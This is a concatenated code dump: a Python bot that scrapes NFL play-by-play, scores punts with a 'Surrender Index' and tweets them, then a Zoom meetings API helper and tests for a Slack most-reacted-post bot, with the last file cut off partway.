home_possession = True
for away_punter in away_punters:
if away_punter in play['text']:
away_possession = True
if home_possession == away_possession:
return ''
else:
return home if home_possession else away
def get_possessing_team_from_punt_distance(play, game):
try:
split = play['text'].split(" ")
if split[1] == 'punts':
if int(split[2]) > int(play['yard_line'].split(" ")[1]):
return play['yard_line'].split(" ")[0]
if 'touchback' in play['text'].lower():
punt_distance = int(split[2])
if punt_distance > 50:
return play['yard_line'].split(" ")[0]
else:
return return_other_team(game,
play['yard_line'].split(" ")[0])
punt_distance = int(split[2]) + int(split[6])
if punt_distance > 50:
return play['yard_line'].split(" ")[0]
else:
return return_other_team(game, play['yard_line'].split(" ")[0])
return ''
except BaseException:
return ''
def get_possessing_team_from_drive(drive):
accordion_header = drive.find_element_by_xpath('../../..')
team_logo = accordion_header.find_element_by_class_name('team-logo')
if team_logo.get_attribute("src") is None:
team_logo = team_logo.find_element_by_tag_name('img')
img_name = team_logo.get_attribute("src")
index = img_name.find(".png")
return img_name[index - 3:index].lstrip("/").upper()
def get_possessing_team(play, drive, game):
possessing_team = get_possessing_team_from_play_roster(play, game)
if possessing_team != '':
return possessing_team
possessing_team = get_possessing_team_from_punt_distance(play, game)
return possessing_team if possessing_team != '' else get_possessing_team_from_drive(
drive)
### TEAM ABBREVIATION FUNCTIONS ###
def get_abbreviations(game):
return get_inner_html_of_elements(
game.find_elements_by_class_name("abbrev"))
def get_home_team(game):
return get_abbreviations(game)[1]
def get_away_team(game):
return get_abbreviations(game)[0]
def return_other_team(game, team):
return get_away_team(game) if get_home_team(
game) == team else get_home_team(game)
### GAME INFO FUNCTIONS ###
def get_game_id(game):
return game.current_url[-14:-5]
def get_game_header(game):
header_eles = game.find_elements_by_css_selector('div.game-details.header')
return get_inner_html_of_element(
header_eles[0]) if len(header_eles) > 0 else ""
def is_final(game):
element = game.find_element_by_class_name("status-detail")
is_final = 'final' in get_inner_html_of_element(element).lower()
if debug:
time_print(("is final", is_final))
return is_final
def is_postseason(game):
header = get_game_header(game).lower()
is_postseason = 'playoff' in header or 'championship' in header or 'super bowl' in header
if debug:
time_print(("is postseason", is_postseason))
return is_postseason
### SCORE FUNCTIONS ###
def get_scores(game):
parent_elements = game.find_elements_by_class_name("score-container")
elements = list(
map(lambda x: x.find_element_by_tag_name("div"), parent_elements))
return get_inner_html_of_elements(elements)
def get_home_score(play, drive, drives, game):
drive_index = drives.index(drive)
return get_drive_scores(drives, drive_index, game)[1]
def get_away_score(play, drive, drives, game):
drive_index = drives.index(drive)
return get_drive_scores(drives, drive_index, game)[0]
def get_drive_scores(drives, index, game):
if is_final(game):
if index == 0:
drive = drives[0]
else:
drive = drives[index - 1]
else:
if index == len(drives) - 1:
drive = drives[-1]
else:
drive = drives[index + 1]
accordion_header = drive.find_element_by_xpath('../../..')
away_parent = accordion_header.find_element_by_class_name(
'home') # this is intentional, ESPN is dumb
home_parent = accordion_header.find_element_by_class_name(
'away') # this is intentional, ESPN is dumb
away_score_element = away_parent.find_element_by_class_name('team-score')
home_score_element = home_parent.find_element_by_class_name('team-score')
away_score, home_score = int(
get_inner_html_of_element(away_score_element)), int(
get_inner_html_of_element(home_score_element))
if debug:
time_print(("away score", away_score))
time_print(("home score", home_score))
return away_score, home_score
### PLAY FUNCTIONS ###
def is_punt(play):
text = play['text'].lower()
if 'fake punt' in text:
return False
if 'punts' in text:
return True
if 'punt is blocked' in text:
return True
if 'punt for ' in text:
return True
return False
def is_penalty(play):
return 'penalty' in play['text'].lower()
def get_yrdln_int(play):
return int(play['yard_line'].split(" ")[-1])
def get_field_side(play):
if '50' in play['yard_line']:
return None
else:
return play['yard_line'].split(" ")[0]
def get_time_str(play):
return play['time']
def get_qtr_num(play):
qtr = play['qtr']
if qtr == 'OT':
return 5
elif qtr == '2OT':
return 6
elif qtr == '3OT':
return 7
else:
return int(qtr[0])
def is_in_opposing_territory(play, drive, game):
is_in_opposing_territory = get_field_side(play) != get_possessing_team(
play, drive, game)
if debug:
time_print(("is in opposing territory", is_in_opposing_territory))
return is_in_opposing_territory
def get_dist_num(play):
return int(play['dist'])
### CALCULATION HELPER FUNCTIONS ###
def calc_seconds_from_time_str(time_str):
minutes, seconds = map(int, time_str.split(":"))
return minutes * 60 + seconds
def calc_seconds_since_halftime(play, game):
# Regular season games have only one overtime of length 10 minutes
if not is_postseason(game) and get_qtr_num(play) == 5:
seconds_elapsed_in_qtr = (10 * 60) - calc_seconds_from_time_str(
get_time_str(play))
else:
seconds_elapsed_in_qtr = (15 * 60) - calc_seconds_from_time_str(
get_time_str(play))
seconds_since_halftime = max(
seconds_elapsed_in_qtr + (15 * 60) * (get_qtr_num(play) - 3), 0)
if debug:
time_print(("seconds since halftime", seconds_since_halftime))
return seconds_since_halftime
def calc_score_diff(play, drive, drives, game):
drive_index = drives.index(drive)
away, home = get_drive_scores(drives, drive_index, game)
if get_possessing_team(play, drive, game) == get_home_team(game):
score_diff = int(home) - int(away)
else:
score_diff = int(away) - int(home)
if debug:
time_print(("score diff", score_diff))
return score_diff
### SURRENDER INDEX FUNCTIONS ###
def calc_field_pos_score(play, drive, game):
try:
if get_yrdln_int(play) == 50:
return (1.1)**10.
if not is_in_opposing_territory(play, drive, game):
return max(1., (1.1)**(get_yrdln_int(play) - 40))
else:
return (1.2)**(50 - get_yrdln_int(play)) * ((1.1)**(10))
except BaseException:
return 0.
def calc_yds_to_go_multiplier(play):
dist = get_dist_num(play)
if dist >= 10:
return 0.2
elif dist >= 7:
return 0.4
elif dist >= 4:
return 0.6
elif dist >= 2:
return 0.8
else:
return 1.
def calc_score_multiplier(play, drive, drives, game):
score_diff = calc_score_diff(play, drive, drives, game)
if score_diff > 0:
return 1.
elif score_diff == 0:
return 2.
elif score_diff < -8.:
return 3.
else:
return 4.
def calc_clock_multiplier(play, drive, drives, game):
if calc_score_diff(play, drive, drives,
game) <= 0 and get_qtr_num(play) > 2:
seconds_since_halftime = calc_seconds_since_halftime(play, game)
return ((seconds_since_halftime * 0.001)**3.) + 1.
else:
return 1.
def calc_surrender_index(play, drive, drives, game):
field_pos_score = calc_field_pos_score(play, drive, game)
yds_to_go_mult = calc_yds_to_go_multiplier(play)
score_mult = calc_score_multiplier(play, drive, drives, game)
clock_mult = calc_clock_multiplier(play, drive, drives, game)
if debug:
time_print(play)
time_print("")
time_print(("field pos score", field_pos_score))
time_print(("yds to go mult", yds_to_go_mult))
time_print(("score mult", score_mult))
time_print(("clock mult", clock_mult))
return field_pos_score * yds_to_go_mult * score_mult * clock_mult
### PUNTER FUNCTIONS ###
def find_punters_for_team(team, roster):
base_link = 'https://www.espn.com/nfl/team/roster/_/name/'
roster_link = base_link + team
roster.get(roster_link)
header = roster.find_element_by_css_selector("div.Special.Teams")
parents = header.find_elements_by_css_selector(
"td.Table__TD:not(.Table__TD--headshot)")
punters = set()
for parent in parents:
try:
ele = parent.find_element_by_class_name("AnchorLink")
full_name = ele.get_attribute("innerHTML")
split = full_name.split(" ")
first_initial_last = full_name[0] + '.' + split[-1]
punters.add(first_initial_last)
except BaseException:
pass
return punters
def download_punters():
global punters
punters = {}
if os.path.exists('punters.json'):
file_mod_time = os.path.getmtime('punters.json')
else:
file_mod_time = 0.
if time.time() - file_mod_time < 60 * 60 * 12:
# if file modified within past 12 hours
with open('punters.json', 'r') as f:
punters_list = json.load(f)
for key, value in punters_list.items():
punters[key] = set(value)
else:
team_abbreviations = [
'ARI',
'ATL',
'BAL',
'BUF',
'CAR',
'CHI',
'CIN',
'CLE',
'DAL',
'DEN',
'DET',
'GB',
'HOU',
'IND',
'JAX',
'KC',
'LAC',
'LAR',
'LV',
'MIA',
'MIN',
'NE',
'NO',
'NYG',
'NYJ',
'PHI',
'PIT',
'SEA',
'SF',
'TB',
'TEN',
'WSH',
]
roster = get_game_driver()
for team in team_abbreviations:
time_print("Downloading punters for " + team)
punters[team] = find_punters_for_team(team, roster)
roster.quit()
punters_list = {}
for key, value in punters.items():
punters_list[key] = list(value)
with open('punters.json', 'w') as f:
json.dump(punters_list, f)
### STRING FORMAT FUNCTIONS ###
def get_pretty_time_str(time_str):
return time_str[1:] if time_str[0] == '0' and time_str[1] != ':' else time_str
def get_qtr_str(qtr):
return qtr if 'OT' in qtr else 'the ' + get_num_str(int(qtr[0]))
def get_ordinal_suffix(num):
last_digit = str(num)[-1]
if last_digit == '1':
return 'st'
elif last_digit == '2':
return 'nd'
elif last_digit == '3':
return 'rd'
else:
return 'th'
def get_num_str(num):
rounded_num = int(num) # round down
if rounded_num % 100 == 11 or rounded_num % 100 == 12 or rounded_num % 100 == 13:
return str(rounded_num) + 'th'
# add more precision for 99th percentile
if rounded_num == 99:
if num < 99.9:
return str(round(num, 1)) + get_ordinal_suffix(round(num, 1))
elif num < 99.99:
return str(round(num, 2)) + get_ordinal_suffix(round(num, 2))
else:
# round down
multiplied = int(num * 1000)
rounded_down = float(multiplied) / 1000
return str(rounded_down) + get_ordinal_suffix(rounded_down)
return str(rounded_num) + get_ordinal_suffix(rounded_num)
def pretty_score_str(score_1, score_2):
if score_1 > score_2:
ret_str = 'winning '
elif score_2 > score_1:
ret_str = 'losing '
else:
ret_str = 'tied '
ret_str += str(score_1) + ' to ' + str(score_2)
return ret_str
def get_score_str(play, drive, drives, game):
if get_possessing_team(play, drive, game) == get_home_team(game):
return pretty_score_str(get_home_score(play, drive, drives, game),
get_away_score(play, drive, drives, game))
else:
return pretty_score_str(get_away_score(play, drive, drives, game),
get_home_score(play, drive, drives, game))
### DELAY OF GAME FUNCTIONS ###
def is_delay_of_game(play, prev_play):
return 'delay of game' in prev_play['text'].lower(
) and get_dist_num(play) - get_dist_num(prev_play) > 0
### HISTORY FUNCTIONS ###
def has_been_tweeted(play, drive, game, game_id):
global tweeted_plays
game_plays = tweeted_plays.get(game_id, [])
for old_play in list(game_plays):
old_possessing_team, old_qtr, old_time = old_play.split('_')
new_possessing_team, new_qtr, new_time = play_hash(play, drive,
game).split('_')
if old_possessing_team == new_possessing_team and old_qtr == new_qtr and abs(
calc_seconds_from_time_str(old_time) -
calc_seconds_from_time_str(new_time)) < 50:
# Check if the team with possession and quarter are the same, and
# if the game clock at the start of the play is within 50 seconds.
return True
return False
def has_been_seen(play, drive, game, game_id):
global seen_plays
game_plays = seen_plays.get(game_id, [])
for old_play in list(game_plays):
if old_play == deep_play_hash(play, drive, game):
return True
game_plays.append(deep_play_hash(play, drive, game))
seen_plays[game_id] = game_plays
return False
def penalty_has_been_seen(play, drive, game, game_id):
global penalty_seen_plays
game_plays = penalty_seen_plays.get(game_id, [])
for old_play in list(game_plays):
if old_play == deep_play_hash(play, drive, game):
return True
game_plays.append(deep_play_hash(play, drive, game))
penalty_seen_plays[game_id] = game_plays
return False
def has_been_final(game_id):
global final_games
if game_id in final_games:
return True
final_games.add(game_id)
return False
def play_hash(play, drive, game):
possessing_team = get_possessing_team(play, drive, game)
qtr = play['qtr']
time = play['time']
return possessing_team + '_' + qtr + '_' + time
def deep_play_hash(play, drive, game):
possessing_team = get_possessing_team(play, drive, game)
qtr = play['qtr']
time = play['time']
down = play['down']
dist = play['dist']
yard_line = play['yard_line']
return possessing_team + '_' + qtr + '_' + time + \
'_' + down + '_' + dist + '_' + yard_line
def load_tweeted_plays_dict():
global tweeted_plays
tweeted_plays = {}
if os.path.exists('tweeted_plays.json'):
file_mod_time = os.path.getmtime('tweeted_plays.json')
else:
file_mod_time = 0.
if time.time() - file_mod_time < 60 * 60 * 12:
# if file modified within past 12 hours
with open('tweeted_plays.json', 'r') as f:
tweeted_plays = json.load(f)
else:
with open('tweeted_plays.json', 'w') as f:
json.dump(tweeted_plays, f)
def update_tweeted_plays(play, drive, game, game_id):
global tweeted_plays
game_plays = tweeted_plays.get(game_id, [])
game_plays.append(play_hash(play, drive, game))
tweeted_plays[game_id] = game_plays
with open('tweeted_plays.json', 'w') as f:
json.dump(tweeted_plays, f)
### PERCENTILE FUNCTIONS ###
def load_historical_surrender_indices():
with open('1999-2020_surrender_indices.npy', 'rb') as f:
return np.load(f)
def load_current_surrender_indices():
try:
with open('current_surrender_indices.npy', 'rb') as f:
return np.load(f)
except BaseException:
return np.array([])
def write_current_surrender_indices(surrender_indices):
with open('current_surrender_indices.npy', 'wb') as f:
np.save(f, surrender_indices)
def calculate_percentiles(surrender_index, should_update_file=True):
global historical_surrender_indices
current_surrender_indices = load_current_surrender_indices()
current_percentile = stats.percentileofscore(current_surrender_indices,
surrender_index,
kind='strict')
all_surrender_indices = np.concatenate(
(historical_surrender_indices, current_surrender_indices))
historical_percentile = stats.percentileofscore(all_surrender_indices,
surrender_index,
kind='strict')
if should_update_file:
current_surrender_indices = np.append(current_surrender_indices,
surrender_index)
write_current_surrender_indices(current_surrender_indices)
return current_percentile, historical_percentile
### TWITTER FUNCTIONS ###
def initialize_api():
with open('credentials.json', 'r') as f:
credentials = json.load(f)
auth = tweepy.OAuthHandler(credentials['consumer_key'],
credentials['consumer_secret'])
auth.set_access_token(credentials['access_token'],
credentials['access_token_secret'])
api = tweepy.API(auth)
auth = tweepy.OAuthHandler(credentials['90_consumer_key'],
credentials['90_consumer_secret'])
auth.set_access_token(credentials['90_access_token'],
credentials['90_access_token_secret'])
ninety_api = tweepy.API(auth)
auth = tweepy.OAuthHandler(credentials['cancel_consumer_key'],
credentials['cancel_consumer_secret'])
auth.set_access_token(credentials['cancel_access_token'],
credentials['cancel_access_token_secret'])
cancel_api = tweepy.API(auth)
return api, ninety_api, cancel_api
def initialize_gmail_client():
with open('credentials.json', 'r') as f:
credentials = json.load(f)
SCOPES = ['https://www.googleapis.com/auth/gmail.compose']
email = credentials['gmail_email']
creds = None
if os.path.exists("gmail_token.pickle"):
with open("gmail_token.pickle", "rb") as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'gmail_credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
with open("gmail_token.pickle", "wb") as token:
pickle.dump(creds, token)
return build('gmail', 'v1', credentials=creds)
def initialize_twilio_client():
with open('credentials.json', 'r') as f:
credentials = json.load(f)
return Client(credentials['twilio_account_sid'],
credentials['twilio_auth_token'])
def send_message(body):
global gmail_client
global twilio_client
global notify_using_twilio
with open('credentials.json', 'r') as f:
credentials = json.load(f)
if notify_using_twilio:
message = twilio_client.messages.create(
body=body,
from_=credentials['from_phone_number'],
to=credentials['to_phone_number'])
elif notify_using_native_mail:
script = """tell application "Mail"
set newMessage to make new outgoing message with properties {{visible:false, subject:"{}", sender:"{}", content:"{}"}}
tell newMessage
make new to recipient with properties {{address:"{}"}}
end tell
send newMessage
end tell
tell application "System Events"
set visible of application process "Mail" to false
end tell
"""
formatted_script = script.format(
body, credentials['gmail_email'], body, credentials['gmail_email'])
p = Popen('/usr/bin/osascript', stdin=PIPE,
stdout=PIPE, encoding='utf8')
p.communicate(formatted_script)
else:
message = MIMEText(body)
message['to'] = credentials['gmail_email']
message['from'] = credentials['gmail_email']
message['subject'] = body
message_obj = {'raw': urlsafe_b64encode(message.as_bytes()).decode()}
gmail_client.users().messages().send(userId="me", body=message_obj).execute()
def send_heartbeat_message(should_repeat=True):
global should_text
while True:
if should_text:
send_message("The Surrender Index script is up and running.")
if not should_repeat:
break
time.sleep(60 * 60 * 24)
def send_error_message(e, body="An error occurred"):
global should_text
if should_text:
send_message(body + ": " + str(e) + ".")
def create_delay_of_game_str(play, drive, game, prev_play,
unadjusted_surrender_index,
unadjusted_current_percentile,
unadjusted_historical_percentile):
if get_yrdln_int(play) == 50:
new_territory_str = '50'
else:
new_territory_str = play['yard_line']
if get_yrdln_int(prev_play) == 50:
old_territory_str = '50'
else:
old_territory_str = prev_play['yard_line']
penalty_str = "*" + get_possessing_team(
play, drive,
game) + " committed a (likely intentional) delay of game penalty, "
old_yrdln_str = "moving the play from " + prev_play[
'down'] + ' & ' + prev_play['dist'] + " at the " + prev_play[
'yard_line']
new_yrdln_str = " to " + play['down'] + ' & ' + play[
'dist'] + " at the " + play['yard_line'] + ".\n\n"
index_str = "If this penalty was in fact unintentional, the Surrender Index would be " + str(
round(unadjusted_surrender_index, 2)) + ", "
percentile_str = "ranking at the " + get_num_str(
unadjusted_current_percentile) + " percentile of the 2021 season."
return penalty_str + old_yrdln_str + new_yrdln_str + index_str + percentile_str
def create_tweet_str(play,
drive,
drives,
game,
surrender_index,
current_percentile,
historical_percentile,
delay_of_game=False):
territory_str = '50' if get_yrdln_int(play) == 50 else play['yard_line']
asterisk = '*' if delay_of_game else ''
decided_str = get_possessing_team(
play, drive, game) + ' decided to punt to ' + return_other_team(
game, get_possessing_team(play, drive, game))
yrdln_str = ' from the ' + territory_str + asterisk + ' on '
down_str = play['down'] + ' & ' + play['dist'] + asterisk
clock_str = ' with ' + get_pretty_time_str(play['time']) + ' remaining in '
qtr_str = get_qtr_str(play['qtr']) + ' while ' + get_score_str(
play, drive, drives, game) + '.'
play_str = decided_str + yrdln_str + down_str + clock_str + qtr_str
surrender_str = 'With a Surrender Index of ' + str(
round(surrender_index, 2)
) + ', this punt ranks at the ' + get_num_str(
current_percentile
) + ' percentile of cowardly punts of the 2021 season, and the ' + get_num_str(
historical_percentile) + ' percentile of all punts since 1999.'
return play_str + '\n\n' + surrender_str
def tweet_play(play, prev_play, drive, drives, game, game_id):
global api
global ninety_api
global cancel_api
global should_tweet
delay_of_game = is_delay_of_game(play, prev_play)
if delay_of_game:
updated_play = play.copy()
updated_play['dist'] = prev_play['dist']
updated_play['yard_line'] = prev_play['yard_line']
surrender_index = calc_surrender_index(updated_play, drive, drives,
game)
current_percentile, historical_percentile = calculate_percentiles(
surrender_index)
unadjusted_surrender_index = calc_surrender_index(
play, drive, drives, game)
unadjusted_current_percentile, unadjusted_historical_percentile = calculate_percentiles(
unadjusted_surrender_index, should_update_file=False)
tweet_str = create_tweet_str(updated_play, drive, drives, game,
surrender_index, current_percentile,
historical_percentile, delay_of_game)
else:
surrender_index = calc_surrender_index(play, drive, drives, game)
current_percentile, historical_percentile = calculate_percentiles(
surrender_index)
tweet_str = create_tweet_str(play, drive, drives, game,
surrender_index, current_percentile,
historical_percentile, delay_of_game)
time_print(tweet_str)
if delay_of_game:
delay_of_game_str = create_delay_of_game_str(
play, drive, game, prev_play, unadjusted_surrender_index,
unadjusted_current_percentile, unadjusted_historical_percentile)
time_print(delay_of_game_str)
if should_tweet:
status = api.update_status(tweet_str)
if delay_of_game:
api.update_status(delay_of_game_str,
in_reply_to_status_id=status.id_str)
# Post the status to the 90th percentile account.
if current_percentile >= 90. and should_tweet:
ninety_status = ninety_api.update_status(tweet_str)
if delay_of_game:
ninety_api.update_status(
delay_of_game_str, in_reply_to_status_id=ninety_status.id_str)
thread = threading.Thread(target=handle_cancel,
args=(ninety_status._json, tweet_str))
thread.start()
update_tweeted_plays(play, drive, game, game_id)
### CANCEL FUNCTIONS ###
def post_reply_poll(link):
driver = get_twitter_driver(link)
driver.find_element_by_xpath("//div[@aria-label='Reply']").click()
driver.find_element_by_xpath("//div[@aria-label='Add poll']").click()
driver.find_element_by_name("Choice1").send_keys("Yes")
driver.find_element_by_name("Choice2").send_keys("No")
Select(driver.find_element_by_xpath(
"//select[@aria-label='Days']")).select_by_visible_text("0")
Select(driver.find_element_by_xpath(
"//select[@aria-label='Hours']")).select_by_visible_text("1")
Select(driver.find_element_by_xpath(
"//select[@aria-label='Minutes']")).select_by_visible_text("0")
driver.find_element_by_xpath("//div[@aria-label='Tweet text']").send_keys(
"Should this punt's Surrender Index be canceled?")
driver.find_element_by_xpath("//div[@data-testid='tweetButton']").click()
time.sleep(10)
driver.close()
def check_reply(link):
time.sleep(61 * 60) # Wait one hour and one minute to check reply
driver = get_game_driver(headless=False)
driver.get(link)
time.sleep(3)
poll_title = driver.find_element_by_xpath("//*[contains(text(), 'votes')]")
poll_content = poll_title.find_element_by_xpath("./../../../..")
poll_result = poll_content.find_elements_by_tag_name("span")
poll_values = [poll_result[2], poll_result[5]]
poll_floats = list(
map(lambda x: float(x.get_attribute("innerHTML").strip('%')),
poll_values))
driver.close()
time_print(("checking poll results: ", poll_floats))
return poll_floats[0] >= 66.67 if len(poll_floats) == 2 else None
def cancel_punt(orig_status, full_text):
global ninety_api
global cancel_api
ninety_api.destroy_status(orig_status['id'])
cancel_status = cancel_api.update_status(full_text)._json
new_cancel_text = 'CANCELED https://twitter.com/CancelSurrender/status/' + cancel_status[
'id_str']
time.sleep(10)
ninety_api.update_status(new_cancel_text)
def handle_cancel(orig_status, full_text):
try:
orig_link = 'https://twitter.com/surrender_idx90/status/' + orig_status[
'id_str']
post_reply_poll(orig_link)
if check_reply(orig_link):
cancel_punt(orig_status, full_text)
except Exception as e:
traceback.print_exc()
time_print("An error occurred when trying to handle canceling a tweet")
time_print(orig_status)
time_print(e)
send_error_message(
e, "An error occurred when trying to handle canceling a tweet")
### CURRENT GAME FUNCTIONS ###
def time_print(message):
print(get_current_time_str() + ": " + str(message))
def get_current_time_str():
return datetime.now().strftime("%b %-d at %-I:%M:%S %p")
def get_now():
return datetime.now(tz=tz.gettz())
def update_current_year_games():
global current_year_games
two_months_ago = get_now() - timedelta(days=60)
scoreboard_urls = espn.get_all_scoreboard_urls("nfl", two_months_ago.year)
current_year_games = []
for scoreboard_url in scoreboard_urls:
data = None
backoff_time = 1.
while data is None:
try:
data = espn.get_url(scoreboard_url)
except BaseException:
time.sleep(backoff_time)
backoff_time *= 2.
for event in data['content']['sbData']['events']:
current_year_games.append(event)
def get_active_game_ids():
global current_year_games
global completed_game_ids
now = get_now()
active_game_ids = set()
for game in current_year_games:
if game['id'] in completed_game_ids:
# ignore any games that are marked completed (which is done by
# checking if ESPN says final)
continue
game_time = parser.parse(
game['date']).replace(tzinfo=timezone.utc).astimezone(tz=None)
if game_time - timedelta(minutes=15) < now and game_time + timedelta(
hours=6) > now:
# game should start within 15 minutes and not started more than 6
# hours ago
active_game_ids.add(game['id'])
return active_game_ids
def clean_games(active_game_ids):
global games
global clean_immediately
global disable_final_check
global completed_game_ids
for game_id in list(games.keys()):
if game_id not in active_game_ids:
games[game_id].quit()
del games[game_id]
if not disable_final_check:
if is_final(games[game_id]):
if has_been_final(game_id) or clean_immediately:
completed_game_ids.add(game_id)
games[game_id].quit()
del games[game_id]
def download_data_for_active_games():
global games
active_game_ids = get_active_game_ids()
if len(active_game_ids) == 0:
time_print("No games active. Sleeping for 15 minutes...")
time.sleep(14 * 60) # We sleep for another minute in the live callback
game_added = False
for game_id in active_game_ids:
if game_id not in games:
game = get_game_driver()
base_link = 'https://www.espn.com/nfl/playbyplay?gameId='
game_link = base_link + game_id
game.get(game_link)
games[game_id] = game
game_added = True
if game_added:
time_print("Sleeping 10 seconds for game to load")
time.sleep(10)
clean_games(active_game_ids)
live_callback()
### MAIN FUNCTIONS ###
def live_callback():
global games
start_time = time.time()
for game_id, game in games.items():
try:
time_print('Getting data for game ID ' + game_id)
drives = get_all_drives(game)
for index, drive in enumerate(drives):
num_printed = 0
drive_plays = get_plays_from_drive(drive, game)
for play_index, play in enumerate(drive_plays):
if debug and index == 0 and num_printed < 3:
time_print(play['text'])
num_printed += 1
if not is_punt(play):
continue
if is_penalty(play):
if is_final(game):
if play_index != len(drive_plays) - 1:
continue
else:
if play_index != 0:
continue
if not penalty_has_been_seen(play, drive, game,
game_id):
continue
if has_been_tweeted(play, drive, game, game_id):
continue
if not has_been_seen(play, drive, game, game_id):
continue
if is_final(game):
prev_play = drive_plays[play_index -
1] if play_index > 0 else play
else:
prev_play = drive_plays[play_index +
1] if play_index + 1 < len(drive_plays) else play
tweet_play(play, prev_play, drive, drives, game, game_id)
time_print("Done getting data for game ID " + game_id)
except StaleElementReferenceException:
time_print("stale element, sleeping for 1 second.")
time.sleep(1)
return
while (time.time() < start_time + 60):
time.sleep(1)
def main():
global api
global ninety_api
global cancel_api
global historical_surrender_indices
global should_text
global should_tweet
global notify_using_native_mail
global notify_using_twilio
global final_games
global debug
global not_headless
global clean_immediately
global disable_final_check
global sleep_time
global seen_plays
global penalty_seen_plays
global gmail_client
global twilio_client
global completed_game_ids
parser = argparse.ArgumentParser(
description="Run the Surrender Index bot.")
parser.add_argument('--disableTweeting',
action='store_true',
dest='disableTweeting')
parser.add_argument('--disableNotifications',
action='store_true',
dest='disableNotifications')
parser.add_argument('--notifyUsingTwilio',
action='store_true',
dest='notifyUsingTwilio')
parser.add_argument('--debug', action='store_true', dest='debug')
parser.add_argument('--notHeadless', action='store_true', dest='notHeadless')
parser.add_argument('--disableFinalCheck',
action='store_true',
dest='disableFinalCheck')
args = parser.parse_args()
should_tweet = not args.disableTweeting
should_text = not args.disableNotifications
notify_using_twilio = args.notifyUsingTwilio
notify_using_native_mail = sys.platform == "darwin" and not notify_using_twilio
debug = args.debug
not_headless = args.notHeadless
disable_final_check = args.disableFinalCheck
print("Tweeting Enabled" if should_tweet else "Tweeting Disabled")
api, ninety_api, cancel_api = initialize_api()
historical_surrender_indices = load_historical_surrender_indices()
sleep_time = 1
clean_immediately = True
completed_game_ids = set()
final_games = set()
should_continue = True
while should_continue:
try:
chromedriver_autoinstaller.install()
# update current year games and punters at 5 AM every day
if notify_using_twilio:
twilio_client = initialize_twilio_client()
elif not notify_using_native_mail:
gmail_client = initialize_gmail_client()
send_heartbeat_message(should_repeat=False)
update_current_year_games()
download_punters()
load_tweeted_plays_dict()
seen_plays, penalty_seen_plays = {}, {}
now = get_now()
if now.hour < 5:
stop_date = now.replace(hour=5,
minute=0,
second=0,
microsecond=0)
else:
now += timedelta(days=1)
stop_date = now.replace(hour=5,
minute=0,
second=0,
microsecond=0)
while get_now() < stop_date:
start_time = time.time()
download_data_for_active_games()
clean_immediately = False
sleep_time = 1.
except KeyboardInterrupt:
should_continue = False
except Exception as e:
# When an exception occurs: log it, send a message, and sleep for an
# exponential backoff time
traceback.print_exc()
time_print("Error occurred:")
time_print(e)
time_print("Sleeping for " + str(sleep_time) + " minutes")
send_error_message(e)
time.sleep(sleep_time * 60)
sleep_time *= 2
if __name__ == "__main__":
main()
``` |
{
"source": "JoeyAlpha5/django-zoom-meetings",
"score": 3
} |
#### File: lib/django_zoom_meetings/__init__.py
```python
import jwt
import datetime
import requests
import json
class ZoomMeetings:
def __init__(self,api_key,secret_key,user_email):
self.time_now = datetime.datetime.now()
self.expiration_time = self.time_now+datetime.timedelta(minutes=20)
self.expiration_in_seconds = round(self.expiration_time.timestamp())
# token requirements
self.headers = {"alg": "HS256","typ": "JWT"}
self.payload = {"iss": api_key,"exp": self.expiration_in_seconds}
# generate token
self.request_token = jwt.encode(self.payload,secret_key,algorithm="HS256",headers=self.headers)
self.email = user_email
def CreateMeeting(self,date,topic,meeting_duration,meeting_password):
required_date_format = date.strftime("%Y-%m-%dT%H:%M:%SZ")
url = 'https://api.zoom.us/v2/users/'+self.email+'/meetings'
jsonObj = {"topic": topic, "start_time":required_date_format,"duration":meeting_duration,"password":<PASSWORD>}
header = {'authorization': 'Bearer '+self.request_token}
zoom_create_meeting = requests.post(url,json=jsonObj, headers=header)
return json.loads(zoom_create_meeting.text)
def DeletMeeting(self,meeting_id):
url = 'https://api.zoom.us/v2/meetings/'+str(meeting_id)
header = {'authorization': 'Bearer '+self.request_token}
zoom_delete_meeting = requests.delete(url, headers=header)
return zoom_delete_meeting
def GetMeeting(self,meeting_id):
url = 'https://api.zoom.us/v2/meetings/'+str(meeting_id)
header = {'authorization': 'Bearer '+self.request_token}
get_zoom_meeting = requests.get(url, headers=header)
return json.loads(get_zoom_meeting.text)
``` |
{
"source": "joe-yama/slack-most-reacted",
"score": 2
} |
#### File: slack-most-reacted/tests/test_main.py
```python
from slack_sdk import WebClient
from typing import Optional
import os
from pprint import pprint
# from slackmostreacted import mostreacted
# from slackmostreacted import Post
from slackmostreacted.slack_utils import most_reacted_messages, post_most_reaction_award, search_channel
from slackmostreacted.slack_utils import list_messages
from slackmostreacted.slack_utils import Channel
def test_connect_bot() -> None:
# channel: Channel = search_channel("tmc-zatsudan")
# print(list_messages(channel.id))
# pprint(most_reacted_messages(channel_name="tmc-zatsudan", k=5))
messages = most_reacted_messages("test_award")
post_most_reaction_award("test_award", awarded_message=messages[0])
def test_search_name(slack_webclient_mock: WebClient) -> None:
assert search_channel("test-channel-1", client=slack_webclient_mock).id == "C1"
def test_most_reacted_post() -> None:
# channel = "mychannel"
# post: Post = mostreacted(channel)
pass
``` |
{
"source": "joe-yama/slck-cli",
"score": 3
} |
#### File: slck-cli/tests/test_message.py
```python
from typing import List
from mock_slack_client import MockSlackClient
from slck.message import Message, MessageManager
class TestMessageManager:
def test__initialize(self) -> None:
client: MockSlackClient = MockSlackClient()
MessageManager(client)
def test__list_message_by_channel_id(self) -> None:
client: MockSlackClient = MockSlackClient()
message_manager: MessageManager = MessageManager(client)
messages: List[Message] = message_manager.list(channel="C111", name=False)
assert len(messages) == 4
def test__list_message_by_channel_name(self) -> None:
client: MockSlackClient = MockSlackClient()
message_manager: MessageManager = MessageManager(client)
messages: List[Message] = message_manager.list(channel="general", name=True)
assert len(messages) == 4
def test__popular_message(self) -> None:
client: MockSlackClient = MockSlackClient()
message_manager: MessageManager = MessageManager(client)
popular_post: Message = message_manager.popular(
channel="general", name=True, k=1, permalink=True
)[0]
assert popular_post.user.id == "W012A3CDE"
assert popular_post.ts == "1622007986.001500"
assert popular_post.num_reaction == 3
def test__award_without_post(self) -> None:
client: MockSlackClient = MockSlackClient()
message_manager: MessageManager = MessageManager(client)
result: str = message_manager.award(channel="general", post=False)
expected: str = (
"最もリアクションを獲得したのは "
"<@W012A3CDE|spengler>さんのこのポスト!"
"おめでとうございます!:raised_hands:\n"
